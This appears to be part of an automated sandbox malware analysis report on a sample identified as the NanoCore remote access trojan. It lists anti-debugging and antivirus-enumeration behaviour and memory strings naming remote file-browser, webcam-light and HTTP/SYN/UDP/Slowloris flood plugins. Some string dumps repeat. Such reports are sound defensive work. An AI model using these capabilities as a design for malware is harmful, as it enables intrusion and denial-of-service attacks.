      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_0028A192 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_0028A192
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_00282200 lstrlenW,SendMessageW,SendMessageW,GetWindowTextLengthW,GetProcessHeap,HeapAlloc,GetWindowTextW,SendMessageW,GetProcessHeap,GetProcessHeap,HeapFree,SendMessageW,SendMessageW,GetWindowTextLengthW,GetProcessHeap,HeapAlloc,SendMessageW,1_2_00282200
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_005F005F mov eax, dword ptr fs:[00000030h]1_2_005F005F
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_005F017B mov eax, dword ptr fs:[00000030h]1_2_005F017B
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_005F0109 mov eax, dword ptr fs:[00000030h]1_2_005F0109
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_005F013E mov eax, dword ptr fs:[00000030h]1_2_005F013E
      Source: C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeMemory allocated: page read and write | page guardJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_00285D3D SetUnhandledExceptionFilter,1_2_00285D3D
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_002879C4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_002879C4
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_00283B2B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00283B2B
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_00285D3D SetUnhandledExceptionFilter,2_2_00285D3D
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_002879C4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_002879C4
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_00401E16 SetUnhandledExceptionFilter,2_2_00401E16
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_00401C83 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00401C83
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_004060A4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_004060A4
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_00401F2A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00401F2A

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess created: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeJump to behavior
      Source: tchnhwrvi.exe, 00000002.00000002.566066458.0000000003954000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000039CF000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000034FE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
      Source: tchnhwrvi.exe, 00000002.00000002.571114508.00000000067DB000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program Managerram Managerp
      Source: tchnhwrvi.exe, 00000002.00000002.571585442.000000000722C000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program Managerram Manager
      Source: tchnhwrvi.exe, 00000002.00000002.571150741.000000000691A000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program Managerp
      Source: tchnhwrvi.exe, 00000002.00000002.566066458.00000000034FE000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.000000000389C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000037C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerX
      Source: tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerx
      Source: tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert
      Source: tchnhwrvi.exe, 00000002.00000002.572120377.0000000007AEC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program Manager?
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_0040207B cpuid 2_2_0040207B
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_00286BEA GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,1_2_00286BEA
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

      Stealing of Sensitive Information

      Source: Yara matchFile source: Process Memory Space: tchnhwrvi.exe PID: 1312, type: MEMORYSTR

      Remote Access Functionality

      Source: tchnhwrvi.exeString found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
lpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloa
dUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileV
ersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandl
eTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
      Source: tchnhwrvi.exe, 00000002.00000002.564994074.0000000001587000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.571891406.0000000007620000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.571954055.0000000007660000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000003.317149940.0000000006A39000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.571812469.00000000075F0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
ersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
      Source: tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandl
eTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
      Source: tchnhwrvi.exe, 00000002.00000002.571761394.00000000075C0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.571720723.0000000007590000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.00000000043A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.571671329.0000000007570000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004404000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.566066458.0000000003381000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.571793197.00000000075E0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.571773496.00000000075D0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.571597397.00000000073F0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.565935661.0000000003332000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.571745163.00000000075B0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.571745163.00000000075B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloa
dUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
      Source: tchnhwrvi.exe, 00000002.00000002.571864347.0000000007610000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
